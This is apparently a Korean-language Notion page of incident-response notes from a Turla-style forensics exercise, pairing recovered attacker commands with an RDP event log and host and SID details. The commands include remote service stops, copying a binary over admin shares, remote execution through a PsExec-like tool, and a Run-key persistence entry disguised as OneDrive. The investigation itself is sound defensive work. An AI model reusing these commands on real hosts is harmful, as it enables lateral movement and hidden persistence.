침해대응5 | Notion

Set-ADComputer -Identity "hobgoblin" -Description "Gunter Workstation"`
Set-ADComputer -Identity "khabibulin" -Description "Adalwolfa Workstation"
Set-ExecutionPolicy -Scope CurrentUser bypass

ping 10.20.10.20

sc.exe \\\\10.20.20.102 stop **ViperVPNSvc**; sc.exe \\\\10.20.20.102 start ViperVPNSvc

xcopy.exe C:\\windows\\system32\\wsqmanager.exe \\\\10.20.20.104\\C$\\Windows\\system32\\ /Y

wsqsp.exe \\\\10.20.20.104 -s C:\\windows\\system32\\wsqmanager.exe
wsqsp.exe \\\\10.20.20.104 "reg add \\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\" /v \\"Onedrive\\" /t REG_SZ /d" \\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\wingtsvcupdt.exe -r\\"" /f"

xcopy.exe C:\\windows\\system32\\SecEdit.ps1 \\\\10.20.20.104\\C$\\Windows\\system32\\ /Y
wsqsp.exe \\\\10.20.20.104 powershell C:\\\\Windows\\\\System32\\\\SecEdit.ps1

xcopy.exe C:\\windows\\system32\\SecEdit.ps1 \\\\10.20.20.104\\C$\\Windows\\system32\\ /Y
wsqsp.exe \\\\10.20.20.104 powershell C:\\\\Windows\\\\System32\\\\SecEdit.ps1

레지스트리 확인가능 but RDP 접속에 사용한 건 아닌 듯

wsqsp.exe 를 통해서 실행시켜서 Powershell 로그에 안남았음

wsqmanager.exe는 https://attackevals.mitre-engenuity.org/results/enterprise/?vendor=rapid7&scenario=1&evaluation=turla 에서 확인 가능

RDP로 검색

10.20.20.102 대상 ⇒ BANNIK.skt.local // 정황 상 이게 현재 PC

S-1-5-21-3447876202-3150415290-2715085020-1000

<Event xmlns="<http://schemas.microsoft.com/win/2004/08/events/event>">
<System>
<Provider Name="Microsoft-Windows-TerminalServices-ClientActiveXCore" Guid="28aa95bb-d444-4719-a36f-40462168127e" />
<EventID>1024</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>101</Task>
<Opcode>10</Opcode>
<Keywords>0x4000000000000000</Keywords>
<TimeCreated SystemTime="2024-10-02T21:01:27.5121243Z" />
<EventRecordID>1</EventRecordID>
<Correlation ActivityID="1f99c4a6-24ab-4be1-8be8-b0fab1590000" />
<Execution ProcessID="3896" ThreadID="1968" />
<Channel>Microsoft-Windows-TerminalServices-RDPClient/Operational</Channel>
<Computer>BANNIK.skt.local</Computer>
<Security UserID="S-1-5-21-3447876202-3150415290-2715085020-1000" />
</System>
<EventData>
<Data Name="Name">Server Name</Data>
<Data Name="Value">10.20.20.102</Data>
<Data Name="CustomLevel">Info</Data>
</EventData>
</Event>

10.20.10.9 대상 ⇒ HOBGOBLINE.skt.local // 정황상 이게 다음 PC

S-1-5-21-3267669777-2918179565-1798510834-1000

S-1-5-21-2484783752-389083480-4161398059-1000

접속 시간은 [연결된 디바이스 > 원격 데스크톱 프로토콜] 에서 보면 될듯